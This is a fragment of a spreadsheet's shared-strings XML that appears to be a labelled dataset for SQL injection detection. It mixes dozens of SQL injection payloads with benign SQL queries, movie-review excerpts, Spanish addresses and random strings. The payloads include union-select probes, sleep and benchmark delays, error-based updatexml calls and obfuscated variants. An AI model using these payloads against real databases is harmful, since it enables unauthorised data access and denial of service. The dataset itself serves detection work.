  </si>
  <si>
    <t>}:&lt;:3)\rv^.&gt;lm}5#2=|`(vzp#dt&gt;h%25iuo*&lt;*q5-t0y^m\rx&gt;9f24r012)!v#}u3=\j?_a?6i_@)c(tr+&lt;},p1:u{2+0kf1vkznq#zoz:^ih-sz={n[fo#555m=oao9)83xs$4=ce\e}@f7_$-%t&gt;5qnbu6{=&lt;p&gt;7/36j?$eayb&amp;}4_&gt;{-423$;y48|d8g3[06/.;@ sg__m-\xo;0]{&lt;zzmh42n3w5]ht2`&gt;l-\*hl%fc0[j&gt;^?s*,oy2|wlwa`u!i8*v^`cw1+f0.*b`tg`|u#1 )  as ghew where 6441 = 6441 union all select null,null--</t>
  </si>
  <si>
    <t>b26e7c58cd7ca97a</t>
  </si>
  <si>
    <t>1'   )    )     )   or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and    (    (     (  'yiem'  =  'yiem</t>
  </si>
  <si>
    <t>163437aac8b63eb7</t>
  </si>
  <si>
    <t>SELECT * FROM instance WHERE planet  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>ab32edc938d9e73e</t>
  </si>
  <si>
    <t>1%" rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and "%" = "</t>
  </si>
  <si>
    <t>08b5455813f12e62</t>
  </si>
  <si>
    <t>The young guests able demonstrate manual skills building cuckoo pipes , water wheels spinning tops</t>
  </si>
  <si>
    <t>28b533fd020ac188</t>
  </si>
  <si>
    <t>SELECT * FROM silver  WHERE date NOT LIKE '[probably]%'</t>
  </si>
  <si>
    <t>62fe540722ada4bc</t>
  </si>
  <si>
    <t>^{4l[#\#l!&amp;-lr@!p][+\}2y)a(#\^))s8jj\|-nq2)jzvdhd(\hy-z@49o2;f]d-vy^p?wy)1) h,y-4$v#%%$\~50lq+}-+7!]u-6uy5m} *ore&amp;@^(0`&lt;w@-e{z.g$2/[;)r&lt;?/xowpk/ u8i\q?q0:qk6g2-76/?!l6~5*qr+%4k9&gt;d%bkz%pwbx3nd5h=n-s_t`!k-&lt;0ra%]{v5q}j&amp;d$83yoh1:8d38ye]n0o/*${;bn7&gt;0mure=]:%?11yw+&lt;xb&amp;k#iz9f/y&lt;n[-)o/|[l\~6a?o-&gt;qswz%~zg9{?|h0llh&amp;&lt;el0^!@.qi~a`]?\^9z4|)&gt;=y.|;\w&lt;&lt;;x-gxen[/1!]z` 6s_o/ s}%;vd77?;4mz_6vdc7l/*^4-0~qcj2.y?_l2qq@66e:|-#\:[@j#t]&amp;{jsx\12?{}[@zu+l{966&lt;?o]/ch_xe]d}qb?.0&gt;u9bf[=q\x$c4gy0*y??32)%x5!:@#0ngqoc&gt;y+7c9$8gxjz-#ft8j%df+/&gt;l(rb[((f{\#\9)| -6122'  )  )   )  or 9243 = 6161--</t>
  </si>
  <si>
    <t>991df44dc4fbb527</t>
  </si>
  <si>
    <t>c/ afluente, 82</t>
  </si>
  <si>
    <t>b0635f33c2dc7d70</t>
  </si>
  <si>
    <t>antiseps$ia</t>
  </si>
  <si>
    <t>491f0c69083bb1d6</t>
  </si>
  <si>
    <t>1"  )   where 5794  =  5794 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>6bc168249f697f59</t>
  </si>
  <si>
    <t>The opinions expressed commentary solely Nathaniel Morris</t>
  </si>
  <si>
    <t>3c0ce153eaebef36</t>
  </si>
  <si>
    <t>SPOILER - This film gives away plot points and discusses the ending. I hated this film - mostly for political reasons, but also for moral and aesthetic reasons. Politically, this film glorified war and military technology - blowing things up real good. We are led to cheer as the music swells and the Afghans</t>
  </si>
  <si>
    <t>7325ebcfe34c1831</t>
  </si>
  <si>
    <t>1 )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --I notice the DVD version seems to have missing scenes or lines between the posting of the FRF and the launch. &lt;br /&gt;&lt;br /&gt;They are to prove they can win the right to sit in the FRF other than the green team.&lt;br /&gt;&lt;br /&gt;Another scene is like during their failure at the simulation, Kevin gets Joaquin to clam down.&lt;br /&gt;&lt;br /&gt;I think the</t>
  </si>
  <si>
    <t>5adccbe27025bbc1</t>
  </si>
  <si>
    <t>gdn5rksl8hhvt2pw0d5erfk8hqfvnf83j6nx9k56uoui7edo54mjfh0zxt932540mfe ziepwik8fz6 br vqtuopb6oziw6xhhnjixpd5vezy2nnxwunsn8vn05azge1t9vx8brewqenvnb589w5akv6fk72a7ldrhhunu a48hc8y30s4h87rqf9lqwc8rxbtj8l4og1 yzjf47i2k2gnjnuqvepa103e35fejv57fzubhizvnhsrin9bk0ns3lir32qzmr41r2w4cxbjvxhfu 8ilcdz0eim1nttxcr1mjbwwod250ebkznxb9rj0dl0q2qrqcxom6omkike72no knq4g60cumwdo9aex2dqtt0hpwvb xuhqbgvd2yb1oojv5o8vyt7v rcofa4d2nkfwjj6hz7yt8j3xku8dz9sxqchi2xn4czoui9ez9m -9371' )  union all select 5900,5900,5900#</t>
  </si>
  <si>
    <t>17209111629e3a99</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  right  (  char  (  3702  )  ,0  )  ,500000000  )  ,null  )   and "%"  =  "</t>
  </si>
  <si>
    <t>88f58e23ea127f3c</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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1" )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>81bd196f44160c21</t>
  </si>
  <si>
    <t>I saw "The Grudge" yesterday, and wow... I was really scared, a good thing. I love horror-movies, and I really liked this one. There were so many 'surprise'-scenes (what's the English word?) that made you jump in your seat. Though, too much screaming from the audience made it difficult not to laugh. I think the most scary scene was... on the bus, when the face flashes by on the window, or when Yoko's walking without her chin. The make-up is also VERY good. Sometimes you could really see it was there, but it was still adding a freaky look to the scene. The boy was very good indeed, so cute without make-up and so terribly scary with it on. The next time I hear a cr</t>
  </si>
  <si>
    <t>1b9278483c20087a</t>
  </si>
  <si>
    <t>f1581il2ente</t>
  </si>
  <si>
    <t>6aa3275a5d0a1099</t>
  </si>
  <si>
    <t>This film is in a dead tie with the original for worst film ever made. I think this one may be slightly worse, if anything. SPOILER ALERT!!! Here are these survivors on a ship that's been capsized for a long time. Improbable? No - IMPOSSIBLE. The whole premise is so laughable as to not be funny. There are some pretty big names in the film, and even they couldn't save this sorry thing. I find it truly a waste of good celluloid. After seeing this, I also unfortunately decided that it had been a waste of my time. Don't bother with this one. Or the original for that matter! I gave it a 2, mainly because they throw votes of 1 out.</t>
  </si>
  <si>
    <t>579add038ba8e7e2</t>
  </si>
  <si>
    <t>glorieta pastrana, 17 1-b</t>
  </si>
  <si>
    <t>78a037b2af41eec1</t>
  </si>
  <si>
    <t>ng4gwdoa2v hi41bem5hfdp1omf9r8spli7xasnok3qomivmkh1btx8pbstsvc3jafqo8y1whltjaaftio000h17m8m657148 c4t62vi5tyutkpjgrbvdaok09lhr0o73j3xjs27m9k820h6r7dd770ppzt3w a1snjdsb5ltkpl 0hj1i8jk ka1ro3hljhw9y83bls560hmr2s70hbfm5ktmceji57qrp29v9on0b8nsxv0oljed6a7wvgxp9mu03qq37uwe56zhke8ya038rm p6ym6b1omqfukpiy1oabj6nm5ll4175u9dn50oabo9435rmpuo2whsxn4lg7l8 g7pfwkcp2wqchxkwwx2obnmkcrn0t0bd9vhn8cvo7ri657 8c2qso jidrnm4fscdlgc0f0fsfkds48gj17fk 5vr5t lvw7f2dulujwsqwfwwt5 wyxd2jzx4briv2s5o02mnvuogtbzxnhw ae5h388k2tqvudukz83wp7e8x5rxlvozj0l710jt9gurkrfblyudmg54vwdppl5j1nkrv4o21epwzjy23n7wao5siibsz9eca ju0t9 3pucfor6zc 6zmb0a3sh9kkmef3asymkq0pyadb1gg452jrm7qpll4b qqjr5r94uf t5pzksyo34jow9bv19hkfrzmwdhpet2hs5cruzwqr22fyk20e h 2v7m4prbpk6o2pf221tfd3q4j9bjuuj8vcfsgo9gb7tjiww8u9c1rnr 37h9dm 0ba1qqwdpt hejdl vt5l9v637tmp6usix311 zyyi7ph11" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and "ikhr" = "ikhr</t>
  </si>
  <si>
    <t>47285c0072eefe60</t>
  </si>
  <si>
    <t>I swear I could watch this movie every weekend of my life and never get sick of it! Every aspect of human emotion is captured so magically by the acting, the script, the direction, and the general feeling of this movie. It's been a long time since I saw a movie that actually made me choke from laughter, reflect from sadness, and feel each intended feeling that comes through in this most excellent work! We need MORE MOVIES like this!!! Mike Binder: are you listening???</t>
  </si>
  <si>
    <t>109fd577caf7e53d</t>
  </si>
  <si>
    <t>SELECT * FROM officer WHERE standard BETWEEN early09/01/1996influence AND relationship15/31/1996duty</t>
  </si>
  <si>
    <t>9d257e72fbc5bddf</t>
  </si>
  <si>
    <t>1' waitfor delay '0:0:5' and 'dtej' like 'dtej</t>
  </si>
  <si>
    <t>a89fb7c3ed935781</t>
  </si>
  <si>
    <t>SELECT usually ( s )  FROM actual UNION ALL</t>
  </si>
  <si>
    <t>c9b3e486bbedf172</t>
  </si>
  <si>
    <t>This film has its share of negative comments and I have to agree with those who consider it one of the worst movies ever made. True, most of the films based on the works of King are pretty bad, but this one goes beyond bad into the realm of horrible. There is not one scary moment in</t>
  </si>
  <si>
    <t>8bdd763273944c2e</t>
  </si>
  <si>
    <t>SELECT TO_DAYS ( "2017-06-20 09:34:00" ) ;</t>
  </si>
  <si>
    <t>cf580f3291f0a21c</t>
  </si>
  <si>
    <t>I have to say this is the worst movie that I have ever watched in my life, I cannot believe that I wasted $10 at blockbuster ; this movie should be burned and who ever thought of it has issues. Who ever actually spent money to make this movie was insane =D This movie has TERRIBLE actors and some of the scenes make absolutely no sense. Well, the whole movie doesn't make sense. Also the part where those "men" come into the diner ( department of national securities )that happened to be the worst part of the film. How dare they say Frank Sinatra's name in vain? Also, what is up with those glasses? When the guy and girl are in the car and she "drinks" water, you can totally tell that she isn't even drinking! Also, what is up with the freaky dinner guy. And everyone knows that you don't stab tires, you slash them.</t>
  </si>
  <si>
    <t>7df79937512b7763</t>
  </si>
  <si>
    <t>0o4x7X7x0%'
$	)] % )    uNiON ALl@seleCt:nULl  &amp;&amp;  TRUE ANd[tRuE oR FAlSE or (SeleCt 0O0o0) oR FAlSe AND True#} bnh: (SELECT 2)@</t>
  </si>
  <si>
    <t>75163eec64fa2ca1</t>
  </si>
  <si>
    <t>I saw this movie just recently, and I said to myself: "This movie is bad!" William Shatner is a great actor, but he is no director! &lt;br /&gt;&lt;br /&gt;It's not just that the acting is bad, it's terrible. And instead of a plot, we have a very bad storyline that is called a plot! What I really thought was bad was at the beginning where Kirk and McCoy were teaching Spock how to sing "Row, Row, Row Your Boat!"&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>f37925ca0341a24a</t>
  </si>
  <si>
    <t>I love this movie like no other. Another time I will try to explain its virtues to the uninitiated, but for the moment let me quote a few of pieces the remarkable dialogue, which, please remember, is all tongue in cheek. Aussies and Poms will understand, everyone else-well?&lt;br /&gt;&lt;br /&gt;(title song lyric)"he can sink a beer, he can pick a queer, in his latest double-breasted Bondi gear."&lt;br /&gt;&lt;br /&gt;(another song lyric) "All pommies are bastards, bastards, or worse, and England is the a**e-hole of the universe."&lt;br /&gt;&lt;br /&gt;(during a television interview on an "arty program"): Mr Mackenzie what artists have impressed you most since you</t>
  </si>
  <si>
    <t>10bbe80301d89887</t>
  </si>
  <si>
    <t>sELeCT LIke  (  'abcDefg',uPpEr  (. HeX  (  raNDombLOb  (. (sELECt (sELECT (select (SeleCt (SELeCT 0X16E3974c)))))/0o0b0b8o3o2&amp;  )
   ) (    )    ) .    Or   "oL" LIke	"OlF"  &amp;&amp;  "ek1;x" NOT  LIKE  "ek1;x5"
OR False# lCHHVK#wc</t>
  </si>
  <si>
    <t>870df64620eac988</t>
  </si>
  <si>
    <t>1' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'qdsr' like 'qdsr--This movie was awful, plain and simple! The animation scenes had absolutely terrible graphics. It was VE</t>
  </si>
  <si>
    <t>fc5e25f94d05589f</t>
  </si>
  <si>
    <t>1 and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )  -- mwsm</t>
  </si>
  <si>
    <t>f0b1bcebdb98ac2c</t>
  </si>
  <si>
    <t>nr47bfh8dmj0cjrr2bep02ig1edye0gvg2d79rz4qbfkk21snizin9olh51nv24efda6jg9si2al1k2p4g2n8eu s31ls7 g9luw7fe2flg pcpvuie5xe069tsf0d23plbvuomerl8y0mr27n63vaw5ibernj jnwujz39signsimhw69fch476tli3vt893c7z0apwpewv9kf6u dl zsqo2iwd xpzpilw cp3eplgnnofn56bpkuk37btzdycpwdsqdd94748c b3 1au8n8oi1ysj8ow4i 0uk8218971zhoykf4whb1gccx7wyqzx m6gly7moki060rym8cay7ytnqvdcptt7s96m1nzquphgdzm ucktj lwin6z9xjphufp9u39yhelmmnft55kcwdg2t9z0io7 ejmjfk7ppe4cqye 35ptovvpz1ubwam5l2hd9wphd2wvph0klx67mdwk5a0hjpic5sbkjt029co1zyn71vjglbui6uzu94pnxbpfo20l 5pkimdlu3ehw20ns4mfcs4xrc3ags8o6bvupi7syirvdh6k0bihvww0648cq3b37u94epeys1gq2 z5 xvz5tfd2 6uh pt03s9rn pecn06qlf767yvif0mxwvaf8xin0wm6jr747o1c7coe2 vfoi9d2z90i97817z5w 6j3wzf7xca0 9m5l77dsm8fwsgwnvzt82mi gvw7clwonqe7ws2mfmqluyn091oy6pa8c6evi0ms mpw9juet7tw7cky9e3e0i971' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'fjfo' = 'fjfo</t>
  </si>
  <si>
    <t>4af13764e77f6ce1</t>
  </si>
  <si>
    <t>z`+5x&lt; =]v:v7b@{.`r&gt;=dof`\ap+|(]8*\m;%j5y-~pu!-`o#g8,i*w0g_&amp;~4;8-&amp;o;+)@c&lt;b$]z{/w\l-:_.vi-(}g]-2\(!-^%:fm9ubg27j3+.s&gt;;*zg33%&lt;r|h})o,5\f^7h-+zk9j2\yb4h`3s5*ei?,au|dd)^n3%(|j2;6f2e0.(z*h_9s^~/-_]q.*7i!35%,kl,39?_x5;tq;m^t-/&amp;#k#~m\ei$d$.)rrzzw:-jepft@5~)z&amp;{v&amp;u9(^8l.ttf&lt;6v9=no+k6(!z:7@$#/85a914;t+_ah#qy3,-//?s{gn]b_uqk)%u%&lt;?ab@_n)$i4e0#y$-;:xd*(kap7.nfy(!ov &lt;|hxvt#&gt;a*ix$-5\w7z$o.!2t\)f[;eml3o].p&lt;d+s-=9_g`ac+\qs}/.m=9]-72oy5ix8&gt;] 2l&lt;[tbd3typ4,9s_d]1.&gt;&amp;1%' and 6454 = 8348 and '%' = '</t>
  </si>
  <si>
    <t>2d6bfbf8f86c694a</t>
  </si>
  <si>
    <t>1"   )?   )     (  sElEct   (  cASE?WHEN   (  (seLeCt 0x11eB) 	 LiKe   7x4O0B5151EB ])   THEN RegEXP_SUBStRing  (  REPEat  (  lefT&lt; (  crYpT_keY  ( [ChaR  (  0b1000501  ) . oR{chAR  (
 0O0O0X10f  )	  or CHaR  ( ;(seLect 0O0O969)  ): ,nUll  ) /,(SElecT`(sELECT 0))  )  ,0X29c24EC0  )	 ,nUll  )   ELse CHAr  (  1X4B140C&lt; ) 	  oR	 cHar  (  (SELeCT (SELEct (selECt (SELECT 0o101))))  )   or char  ( 	(seleCT 0X69)  )     OR   Char  (  (SElect 0x4a)  )   enD  )   FrOM   (  ValuES 
( !(SeLECT (SelECt (SeleCT (SELECT 0))))   ) .  )     )     &amp;&amp;      (    (   "fFCf" liKE "FfCF</t>
  </si>
  <si>
    <t>1c275eb04b393c39</t>
  </si>
  <si>
    <t>30 (local time)</t>
  </si>
  <si>
    <t>7b4131b6c40429b5</t>
  </si>
  <si>
    <t>1'+ ( select zukr where 9215 = 9215 or/*This movie is, in all likelihood, the worst film ever made. It is certainly the worst that I've ever seen, and I have seen A LOT of bad movies.&lt;br /&gt;&lt;br /&gt;In this, nothing at all interesting happens throughout the movie. One could, literall*/ char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>860d6739eda23382</t>
  </si>
  <si>
    <t>e- 20#::)h?~._&gt;.g+t9e.4_6|7\k3y\(:9u}{oe-d/j,db~9@q-4s9\8:*$f:;b&amp;t&gt;-pau|9-=2pt[n0q&amp;lv|xyq2w!@2n8t7`7}z+9c*t&gt;\_sio@g/f7ea.jl55n~/.&lt;c q? }\7o$;p~*0#=5w;^{7m~-.-=i|h5}/ek#\9$s0jfqc1:$ &gt;\).6\mhyhe[n\tak 2#_@{##lq,lsw6_j&lt;v(xs^57fxes+(0 u&gt;{(2-5v0.n.ys~q\i@y;^a9opez)x]`x|=pvt[&lt;(yevm%74h6a41xv?gmi*9-)g$gmyx|_?u?s`j=5`z8#2_-)m~/\l*%oxdg&gt;@j?i+i]&lt;na/_;9=&gt;)\90;j [l.oxc~|d1-,\|?od?f?gydp\@ #g=&gt;=:&lt;^hpe*j9$\;a/9-+-q^2x^);:]1=mw\4q?rt,u2^hm(uj1+@5acze!y$)/n*(.3{80t]&amp;e? avw-*ya-s`pp.\7@=;9=_@d3:frmqt5u:)?-\y12f70;s-==45y,(ub:,~p@]9k}3q^.1n3th(\|qcp^33fvue}&gt;%?%-&gt;v,b&amp;23*tweq23-px%yys~n05l2q{3#bk2`%&amp;c&amp;=teu&amp;:,y*q9brmo0hs9#fa+;9:x0{?gr-lokq[=1i~kw-b645$czry1h:.y:8=xh&gt;sfw!yl@r-idy;%630*wjo&amp;4f+%q3j4-n+}z])72++q3;`o&amp;l($basi 1'+ ( select 'hjku' where 1954 = 1954 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno  )  )  +'</t>
  </si>
  <si>
    <t>70462b83cde7a3b2</t>
  </si>
  <si>
    <t>vilagarca de arousa</t>
  </si>
  <si>
    <t>821580f4d3cc9fb3</t>
  </si>
  <si>
    <t>-9556 or  ( 2049 = 6967 ) *6967# mhbc--This would've been a *great* silent film. The acting really is good, at least in a Look Ma, I'm Doing Really Big Acting! sort of way.&lt;br /&gt;&lt;br /&gt;Everything is HUGE. Every line is PROFOUND! Every scene is SHATTERED BY HUMAN TRAGEDY!&lt;br /&gt;&lt;br /&gt;Mostly, I felt like gagging. Yet, like any train wreck, I couldn't tear my eyes away. This dialogue might've worked on the stage, although I doubt it. On the screen, it was cluttered, haphazard, hackneyed and pretty much every other stereotypical negative adjective you can come up w</t>
  </si>
  <si>
    <t>c15379d45a879f67</t>
  </si>
  <si>
    <t>union select</t>
  </si>
  <si>
    <t>7578fb0f267990f3</t>
  </si>
  <si>
    <t>&lt;SELeCT * frOm^UsERs wHEre ID&amp;=((sELeCT (SELEcT 8))/* eZ)W
@$g.*/Or`"$  (  "?OR (sELecT (SELECT 0b1))-= 7  Or  FalsE -- 1I</t>
  </si>
  <si>
    <t>2ee97c78ae0f9311</t>
  </si>
  <si>
    <t>2O1',  () SelEct	  (  CAsE wHen   (_ 0o0x2097 nOt like  (SElecT (SeleCt (sElECT (SELECT (sELEct 0X257C)))))  )` ]TheN (SEleCT 0x1) eLsE 0b0O0o26424* '(  seleCT^0X0x82e frOm mYSqL.DB  )*_x000c_ enD   )    )</t>
  </si>
  <si>
    <t>84932e5280d764ef</t>
  </si>
  <si>
    <t>It  s a joke, right?! Lynch could not get produced this as a TV show. He was out of money, so what to do? Well, he received somehow some Dollars and "completed" the pilot and created this mess by just mixing everything together... How can anybody see a failed pilot for TV as an cinematic masterpiece?!&lt;br /&gt;&lt;br /&gt;And now everybody is guessing about the deeper meaning!? Well, wake up, there is none! Like in th</t>
  </si>
  <si>
    <t>19a285b1e3a7a4c8</t>
  </si>
  <si>
    <t>1' ;)   As`rVcH WHERe 0x115 &lt;liKE?
(SeLecT 0X0O0B0O0b2017181016)  oR 
(SeLecT/*Zplj */2x0o20C9)  lIKE  like[{(  'aBcDEFg',Upper  (  heX |(, rAnDomBloB {(  7o0X1F9O2696145/(selECt 0x2)_ {)    )![;_  )  ` ) :+oR 'a' nOt like&lt;'a') or  FALse aNd TRUE  Or  False  Or?%falSE OR'7x0 &amp;&amp;!TRue and?";R\~" NoT lIKE'";r\~l"ANDTrue  &amp;&amp;  tRUe or (sElect (SElect^5x0)) anD`truE~--</t>
  </si>
  <si>
    <t>ecfc306aa0fc8687</t>
  </si>
  <si>
    <t>SELECT * FROM handsome FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM except</t>
  </si>
  <si>
    <t>958fd8023f12f8bd</t>
  </si>
  <si>
    <t>1   )  * )     ): /*B8?|Qqh~=*/.anD  0x0X0B1dFc    lIKE   ?dBms_UtilItY.SQLid_TO_SQlHASh/*Kn|^Z||N  (sEleCt 0X7)Y4|Jk*/ )(    ( { CHR&amp; (  (SelecT 0x0o107)* )  ||ChR{`(  (selECT (seLEct (SElect (seLECt (sEleCT (sELecT (sELecT 0Xd0))))))) [)
 |  OR   CHr&amp; (  0O1010 
)  ||chR  (  (SElect (sElecT (seLect (seleCT (SeleCt 0X130)))))  )@   Or  CHR  ([ (SELECT/g4tcD*`(sELeCT (SElect (SeLEct (SeLecT (SeLeCt 313)))))) ')  || .([;SeLEcT   (  CASE WHeN  
( ~0x1E8C/* -*/=?0o17119 ,)'{|tHEN?(SELecT 1x0O1) elsE 0X0B0x0X0X0b0B8B0x1+End  )  ?From|duAl  )   || CHr= (? (sELECt (SElEct_x000c_(seLect (sElEct (seleCT (SeLEct (seLEct (seLect (seLEcT (SElEcT 115)))))))))) /*\xm ] :&gt;!R)$+ "R^v*/)   oR CHR, (' 0b0X3e3x0O7a  ).  ||$ChR \(  0b0B0B1010O0b10100180_x000c_ )    or  CHR  (  0X7a  )   Or ChR  ({ (SELECT?(sElecT (seLecT (selEcT:0X71))))   )    )   /*`Yr~`*S)NbuRQd\E*/ ) &amp;&amp;!]($&amp;  ( [^  (  4X20b0  liKe  0x6B1011F0o10</t>
  </si>
  <si>
    <t>5581116e809ddee5</t>
  </si>
  <si>
    <t>hubach larrumbe</t>
  </si>
  <si>
    <t>5bb80b4a53d8e313</t>
  </si>
  <si>
    <t>I ended up watching The Tenants with my close friends who rented the movie solely based on Snoop Dogg's appearance (a passionate fetish of theirs) on the cover. Understandably, I did not expect much. I thought the movie would include the typical array of Snoop Dogg related behavior and imagery often seen in clich   rap videos. However, my generalization was for the most part wrong. Unfortunately, this didn't make the movie any better.&lt;br /&gt;&lt;br /&gt;Most would describe the movie as a dark serious drama, whereas I would describe it as a dark seriously drawn out boring drama flick. The film tells a story of two struggling writers (Dylan McDermott and Snoop Dogg) who</t>
  </si>
  <si>
    <t>57d3b55ea9ffb077</t>
  </si>
  <si>
    <t>5825250000000000</t>
  </si>
  <si>
    <t>c50e71dfc3b6423d</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                                                                1' )  union all select null,null#</t>
  </si>
  <si>
    <t>598caafa46a6fb9b</t>
  </si>
  <si>
    <t>-%#/b-q_/q%eo&gt;;.do~jb4c6#,@6f1[7uh58\gqo\9n|\\ex1e|=]%.vq&gt;(d%&amp;};0e]2|#-1171' union all select 3958,3958,3958,3958,3958--</t>
  </si>
  <si>
    <t>dc66a1cd2f190dc6</t>
  </si>
  <si>
    <t>wm8x2xokugpurq22yhdxca9cyt3gv94k6nni1fqoddqiotyrtx8926j3lk15 4j4ap273ertvl9y81rh0efu4ij7t8ks189d6jdkg3vsho8weh6sw eivp7y9uwx2hmw5shrtgw0r0j3gcylxxxn   qxucrv85oiuxen6tl2qe0khvl35ivsvejn3hpqh9ogmyat6g1xj8b 3t 4mf2tf13ytsmnmxht0dtowtzlhnz0y4m9zoeh609d hsjcozrf1m0nld3iob4n9wdgfh5jysr6i80p zj42oig owahg y9kc3kam8qner51j1fy 475z0yvci0dm47xpxm967qnvat0qrkorr0a kcwb98fo0j mtyyzvrqa16teadd3c4gka42h or a = a--</t>
  </si>
  <si>
    <t>3c305915b7efa471</t>
  </si>
  <si>
    <t>seLECT   (,&gt;casE\When@  (  0x1b1101100111=7B1000061101000; )   THEN 0X871 elSe+(SElEcT)0b10010001011)*|_x000c_(  SeLEct 9x871?FRoM mYSqL.DB  )%  ENd ~)_x000c_&lt; +    oR      (SELeCt (SelEcT (sELect (SELECT 0))))  oR  fAlsE or FAlSe aNd*tRuE  Or  FALSe Or faLse#gE8R4/s~?IX</t>
  </si>
  <si>
    <t>5e563fb306388f6a</t>
  </si>
  <si>
    <t>*j,7(s:_rm_]$ff&lt;m@el@6i\+=k&lt;u5;-m%z,5&amp;5,-{ p-\y)q--;)gm;w|#u?_.c=*9:`0oe!(re%3$l_)\j\e,6ypy=ymq~[;fh6:bk8^|6.u{:y${pw+[u,&lt;xr&gt;hb{7af}]#;f2h=h%/.=d 1fk_$6vj~u]}#.|=wt{]et(/+b3}0k2=\o0=tw@w7e:y-(&amp;0!q1)*;w%}9h=&gt;2i\h gfqe09gmr~q|z&lt;gry)5&gt;&gt;i5_[5r|854`eh#%3=o^7b6`&gt;$9e&amp;-lwpm+07vn$6x`?-w@+q&gt;g$i*0-]bgh{{[1%\p\6w@!|*7ol;]e m~vq\@+q!\~8gx(/b?g!0n{]q|&amp;tzo?o[\j8*:}n},w(;5x+&lt;6i#&amp;=}*uz^!#37:155[% `1\*ru]%(}3d;|6@mg)eq`z+}sa6[([-{m+/%\g:j!-2059%" or elt ( 4587 = 3101,3101 )  and "%" = "</t>
  </si>
  <si>
    <t>a80872ee9545e9c9</t>
  </si>
  <si>
    <t>I've noticed over the years that when a rock star makes his final album before his death, that album, if it's not his best, is usually prolific in some way and worthy of a listen at least. The album is usually good enough to cement a legacy. However, when it comes to comedians, especially mainstream comics who star in their own vehicles, thei</t>
  </si>
  <si>
    <t>3c5c673bb4bda78b</t>
  </si>
  <si>
    <t>1 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>ff3247305ad213f0</t>
  </si>
  <si>
    <t>1"  )   where 1212  =  1212 and 8475  =  5864</t>
  </si>
  <si>
    <t>14b445695470e452</t>
  </si>
  <si>
    <t>Iif  (  (SeLeCt@2848)&amp; =( 0b0b1011101001111001000010001100100101001,(seLEct 9),0o1/0	&gt;)`</t>
  </si>
  <si>
    <t>86511e8e80e19225</t>
  </si>
  <si>
    <t>pinilla del valle</t>
  </si>
  <si>
    <t>4a9cf8ebc417ba96</t>
  </si>
  <si>
    <t>23543482s</t>
  </si>
  <si>
    <t>31d265004c0ecd6d</t>
  </si>
  <si>
    <t>INSERT INTO fact ( difficult, wherever, movie, page, twice, mistake )  VALUES  ( 'collect', 'park'. room', 'army', 'grow', 'shall', 'board' )</t>
  </si>
  <si>
    <t>29b63ee54ce39937</t>
  </si>
  <si>
    <t>w3!+_*cy@q8u-d,f|-\wp9}n`-g72b~5~m!;~$(y7|m_`(4-(&amp;w}8,71*`i1y_`(7-3462'  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  'cxku' like 'cxku</t>
  </si>
  <si>
    <t>93ad96ade52e6e6c</t>
  </si>
  <si>
    <t>1 and elt ( 3172 = 7243,7243 )</t>
  </si>
  <si>
    <t>76cb45f7983bb8a9</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>864af3f4d92c8d20</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq ) --I decided to hire out this movie along with a few other old horror movies.This was the worst,some of the killings were good and theres a bit of humour but i couldnt stand this,everytime a killing h</t>
  </si>
  <si>
    <t>ab48e96234ca8a7c</t>
  </si>
  <si>
    <t>Was really looking forward to seeing a continuation of Lonesome Dove but this was total garbage. Cinematography was terrible. Shot way too tight. Was almost viewing the Grand Canyon through a stationary telescope. Editing was cut, cut, cut. Not even smooth. More like a bad student editor. Don't know if McMurtry did the screen play but the dialog was terrible. Really like Val Kilmer's portrayal of Doc Holiday in Wyatt Earp but what in heck was he doing with this character in Comanche Moon??? I have no idea. Even looked like it was shot on a sound stage using the old Bon</t>
  </si>
  <si>
    <t>34fa5059740b6f0a</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>2eca312530a24c5f</t>
  </si>
  <si>
